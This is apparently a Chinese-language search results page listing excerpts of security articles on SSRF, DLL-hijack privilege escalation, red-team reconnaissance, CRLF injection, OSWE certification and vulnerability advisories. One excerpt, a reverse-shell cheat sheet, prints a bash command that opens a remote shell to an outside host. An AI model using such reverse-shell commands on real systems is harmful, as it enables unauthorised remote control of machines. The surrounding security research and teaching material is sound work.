搜索精彩内容
包含"the hacker"的全部内容
Python安全 – 从SSRF到命令执行惨案
前两天遇到的一个问题,起源是在某个数据包里看到url=这个关键字,当时第一想到会不会有SSRF漏洞。 以前乌云上有很多从SSRF打到内网并执行命令的案例,比如有通过SSRF+S2-016漏洞漫游内网的案例...
IKEEXT DLL劫持利用工具
什么是IKEEXT提权 IKEEXT提权是一种属于windows配置错误的提权方式,IKEEXT是一种windows服务、 IKEEXT 服务BAI托管 Internet 密钥交换(IKE)和身份验证 Internet 协议du(AuthIP)键控模块。这些键...
红蓝对抗之域名搜集方法总结
前言 在历次HW、红蓝对抗、渗透测试项目中,外网的信息收集是至关重要的一个环节,外网打点信息收集全面了,可能会有四两拨千斤效果,直接突破外网边界进入内网。 最近我们三人加入腾讯蓝军学习...
web信息收集-子域名信息收集工具
萌新在这个平台上的第一篇文章,本文中可能有大多语言非专业术语或者写错的地方, 大佬们轻喷 最近灵机乍现,想着写个小工具用于信息收集,于是就有了这篇文章的诞生 目前的话写了一个子域名收...
CRLF注入漏洞详解与实例分析
一、漏洞详解 CRLF是”回车 + 换行”(rn)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTT...
【转】Linux下反弹shell方法
author:waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...
OSCE³-OSWE(Offensive Security Web Expert)考试攻略 – 作者:姑苏城外寒山寺
前言本月中旬收到Offsec邮寄的OSWE证书和会员卡,由于国内关于OSWE认证方面的相关文章很少,于是投稿本文希望能对准备考试的同行有所帮助。Offsec(Offensive Security)因kali、exploitDB、vul...
安全威胁情报周报(2021.06.19-06.25) – 作者:Threatbook
一周情报摘要金融威胁情报继内蒙古、青海之后,四川清理关停虚拟货币“挖矿”虚拟货币遭致命重击:央行约谈六大机构香港证券交易所在内的多家金融机构因网络服务中断遭受影响FIN7 冒充美国证券...
“致命”漏洞!医疗系统安全飞利浦Vue PACS医学成像系统存在严重缺陷 – 作者:中科天齐软件安全中心
Philips临床协作平台门户(又名Vue PACS)披露了多个安全漏洞,其中一些漏洞可能被对攻击者用来控制受影响的系统。美国网络安全和基础设施安全局在一份报告中指出,成功利用这些漏洞可能允许未经...